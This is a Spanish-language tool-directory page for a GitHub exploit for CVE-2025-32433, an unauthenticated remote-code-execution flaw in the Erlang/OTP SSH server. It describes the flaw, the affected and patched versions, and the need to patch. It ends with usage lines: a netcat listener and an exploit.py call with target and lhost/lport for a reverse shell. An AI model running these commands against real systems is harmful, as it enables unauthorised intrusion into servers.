Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-32433 — Resumen de CVE-2025-32433 y Visión General del Ataque | Kitploit
Herramientas/GitHubGitHub/mrdreamreal/cve-2025-32433
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubmrdreamreal/cve-2025-32433

CVE-2025-32433

Resumen de CVE-2025-32433 y Visión General del Ataque

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-32433

Resumen y descripción general del ataque de CVE-2025-32433

CVE-2025-32433 es una vulnerabilidad crítica de ejecución remota de código (RCE) no autenticada en el servidor SSH de Erlang/OTP, divulgada el 16 de abril de 2025. Erlang/OTP SSH es una biblioteca utilizada en diversas aplicaciones distribuidas y de telecomunicaciones. La falla surge del manejo inadecuado de los mensajes del protocolo SSH: el servidor no aplica la secuencia de autenticación normal, lo que permite a un atacante enviar mensajes SSH especialmente diseñados antes de la autenticación. Al hacerlo, el atacante puede inyectar y ejecutar código Erlang arbitrario en el servidor​ nvd.nist.gov ​ offsec.com . En términos prácticos, esto significa que un atacante con acceso de red a un servidor SSH de Erlang/OTP vulnerable (que a menudo se ejecuta como root) puede desencadenar una reverse shell o ejecutar comandos sin credenciales, lo que lleva a un compromiso total del sistema​ nvd.nist.gov ​ offsec.com . Esta vulnerabilidad tiene asignado un CVSS 10.0 (severidad máxima)​ offsec.com .

Las versiones afectadas son todas las versiones de Erlang/OTP inferiores a OTP-27.3.3, OTP-26.2.5.11 u OTP-25.3.2.20 (las versiones parcheadas)​ nvd.nist.gov ​ offsec.com . Los sistemas afectados suelen incluir servidores Linux o dispositivos que ejecutan un daemon SSH basado en Erlang (que no debe confundirse con OpenSSH). Es importante destacar que los servidores OpenSSH predeterminados en Linux/BSD no son vulnerables​ offsec.com . Los usuarios deben asumir que cualquier servidor SSH de Erlang/OTP expuesto está afectado y aplicar los parches oficiales o deshabilitar el servicio SSH de inmediato.

El ataque funciona iniciando una conexión SSH y luego enviando una secuencia de mensajes SSH fuera de orden. :

uso:

sudo chmod +x exploit.py

nc -nvlp

python3 exploit.py -t -p 22 --lhost --lport

ejemplo:

nc -nvlp 5555

python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555

Descargar herramienta